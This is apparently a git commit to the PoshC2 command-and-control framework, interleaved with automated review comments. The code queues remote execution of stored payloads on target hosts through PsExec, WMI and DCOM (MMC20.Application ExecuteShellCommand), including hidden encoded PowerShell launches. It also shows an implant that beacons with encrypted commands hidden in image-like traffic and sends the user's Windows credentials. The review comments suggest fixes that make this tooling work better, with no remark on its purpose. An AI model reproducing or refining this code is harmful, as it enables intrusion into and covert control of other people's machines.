Revert "Revert "Merge branch 'master' of https://github.com/nettitude/PoshC2_Python""

This reverts commit 9f8b17f6a6.
chunking
rolen 2019-01-21 09:49:07 +00:00
parent 9f8b17f6a6
commit 1ef348e32c
6 changed files with 2840 additions and 1515 deletions


@ -3,6 +3,7 @@
from Colours import * from Colours import *
from Config import * from Config import *
from DB import * from DB import *
from Help import *
import time, os import time, os
rows = 10 rows = 10
@ -16,8 +17,10 @@ try:
except Exception as e: except Exception as e:
print "cls" print "cls"
print chr(27) + "[2J" print chr(27) + "[2J"
print Colours.GREEN,""
print logo, Colours.END print (Colours.GREEN + "")
print (logopic)
print (Colours.END + "")
try: try:
taskid = get_seqcount("CompletedTasks") + 1 taskid = get_seqcount("CompletedTasks") + 1
@ -37,6 +40,7 @@ except Exception as e:
user = "None" user = "None"
implantid = 1 implantid = 1
print newtaskid
while(1): while(1):
try: try:
newtask = get_newtasksbyid(newtaskid) newtask = get_newtasksbyid(newtaskid)
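Review bot: `print newtaskid` at the top of the polling loop reads like a leftover debug statement — it dumps the bare task id to the console with no label every time the server starts; if it is meant to stay, label it (`print "Resuming from task id %s" % newtaskid`), otherwise drop it. The same section adds `from Help import *` next to three other star imports while switching from `logo` to `logopic`; an explicit `from Help import logopic` would show where the new name comes from and avoid silently shadowing anything exported by Colours, Config or DB. That `print newtaskid` is on the new side is inferred from its single rendering in this split view, and the `while(1):` body continues past the hunk.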


@ -67,6 +67,8 @@ public class Program
proxy.UseDefaultCredentials = false; proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false; proxy.BypassProxyOnLocal = false;
x.Proxy = proxy; x.Proxy = proxy;
} else {
x.UseDefaultCredentials = true;
} }
var df = "#REPLACEDF#"; var df = "#REPLACEDF#";
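Review bot: The new `else` branch sets `x.UseDefaultCredentials = true` on the WebClient itself, which attaches the logged-on user's Windows credentials to the request target rather than to a proxy; if the intent is to traverse an authenticating proxy when no explicit proxy host is configured, that usually needs the proxy object's credentials instead, e.g. `x.Proxy = WebRequest.GetSystemWebProxy(); x.Proxy.Credentials = CredentialCache.DefaultCredentials;`. As written, the current user's credentials will be offered to whichever host answers the request with an authentication challenge, so a one-line comment stating that this is deliberate would help the next reader. The `if` that this `else` pairs with begins outside the hunk, so the condition it complements is not visible here.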


@ -242,6 +242,8 @@ while(True):
server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri) server = "%%s/%%s%%s" %% (serverclean, random.choice(urls), uri)
opener = urllib2.build_opener() opener = urllib2.build_opener()
if (len(cmd) > 200):
cmd = cmd[0:200]
postcookie = encrypt(key, cmd) postcookie = encrypt(key, cmd)
data = base64.b64decode(random.choice(icoimage)) data = base64.b64decode(random.choice(icoimage))
dataimage = data.ljust( 1500, '\\0' ) dataimage = data.ljust( 1500, '\\0' )
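Review bot: The added `cmd = cmd[0:200]` silently truncates the task text at 200 characters before it is encrypted into the cookie, with nothing telling the server that it happened, so any server-side logic that keys on text beyond that point (the handler in this commit matches substrings such as `"Upload-File" in t[3]`) will see a partial command. If the cap exists to keep the cookie header within a size budget, name it and say so — `MAX_CMD_COOKIE_CHARS = 200  # keep the encrypted SessionID cookie under header-size limits` — and note that it counts plaintext characters, not bytes of the encrypted, base64-expanded cookie. The `if` guard is redundant, since slicing past the end is a no-op: `cmd = cmd[:200]`. The enclosing `while(True):` loop starts and ends outside the hunk.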


@ -317,7 +317,7 @@ def startup(printhelp = ""):
for t in comtasks: for t in comtasks:
hostname = get_implantdetails(t[2]) hostname = get_implantdetails(t[2])
if hostname[2] not in users: if hostname[2] not in users:
users += "%s \n" % hostname[2] users += "%s @ %s\n" % (hostname[2],hostname[3])
if "Upload-File" in t[3]: if "Upload-File" in t[3]:
uploadedfile = t[3] uploadedfile = t[3]
uploadedfile = uploadedfile.partition("estination ")[2] uploadedfile = uploadedfile.partition("estination ")[2]
@ -350,7 +350,7 @@ def startup(printhelp = ""):
else: else:
for task in tasks: for task in tasks:
imname = get_implantdetails(task[1]) imname = get_implantdetails(task[1])
alltasks += "(%s) %s\r\n" % ("%s" % (imname[11]),task[2]) alltasks += "(%s) %s\r\n" % ("%s\\%s" % (imname[11],imname[2]),task[2])
startup("Queued tasks:\r\n\r\n%s" % alltasks) startup("Queued tasks:\r\n\r\n%s" % alltasks)
if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "): if (implant_id.lower() == "cleartasks" ) or (implant_id.lower() == "cleartasks "):
@ -824,18 +824,14 @@ def runcommand(command, randomuri):
elif "invoke-psexecproxypayload" in command.lower(): elif "invoke-psexecproxypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri) check_module_loaded("Invoke-PsExec.ps1", randomuri)
C2 = get_c2server_all() if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
if C2[11] == "": with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE) params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
params = params.sub("", command) params = params.sub("", command)
cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
new_task(cmd, randomuri) new_task(cmd, randomuri)
else:
startup("Need to run createproxypayload first")
elif "invoke-psexecdaisypayload" in command.lower(): elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri) check_module_loaded("Invoke-PsExec.ps1", randomuri)
@ -865,18 +861,14 @@ def runcommand(command, randomuri):
elif "invoke-wmiproxypayload" in command.lower(): elif "invoke-wmiproxypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri) check_module_loaded("Invoke-WMIExec.ps1", randomuri)
C2 = get_c2server_all() if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
if C2[11] == "": with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE) params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
params = params.sub("", command) params = params.sub("", command)
cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload) cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
new_task(cmd, randomuri) new_task(cmd, randomuri)
else:
startup("Need to run createproxypayload first")
elif "invoke-wmidaisypayload" in command.lower(): elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri) check_module_loaded("Invoke-WMIExec.ps1", randomuri)
@ -905,15 +897,16 @@ def runcommand(command, randomuri):
# dcom lateral movement # dcom lateral movement
elif "invoke-dcomproxypayload" in command.lower(): elif "invoke-dcomproxypayload" in command.lower():
C2 = get_c2server_all() if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
C2[13], C2[11], "", "", C2[19], C2[20], params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory) params = params.sub("", command)
payload = newPayload.CreateRawBase() p = re.compile(ur'(?<=-target.).*')
p = re.compile(ur'(?<=-target.).*') target = re.search(p, command).group()
target = re.search(p, command).group() pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload) new_task(pscommand, randomuri)
new_task(pscommand, randomuri) else:
startup("Need to run createproxypayload first")
elif "invoke-dcomdaisypayload" in command.lower(): elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ") daisyname = raw_input("Name required: ")
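Review bot: In the `invoke-dcomproxypayload` branch the new lines compile and apply `re.compile("invoke-wmiproxypayload ", re.IGNORECASE)` — copied from the WMI handler — so the prefix never matches this command, and the resulting `params` is not used afterwards anyway; either delete those two lines or correct the pattern to `"invoke-dcomproxypayload "`. All three rewritten branches also drop `p.read()` verbatim into a double-quoted `-command "..."` or `/c ...` argument, so a trailing newline in `Proxypayload.bat` ends up inside the quoted string; `payload = p.read().strip()` fixes that, while any literal `"` in the file would still need escaping. Building the path once with `proxy_payload = os.path.join(PayloadsDirectory, "Proxypayload.bat")` would also remove the duplicated format string and the implicit assumption that `PayloadsDirectory` ends with a separator. `runcommand` starts and ends outside these hunks.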


Modules/Invoke-DaisyChain.ps1 Executable file → Normal file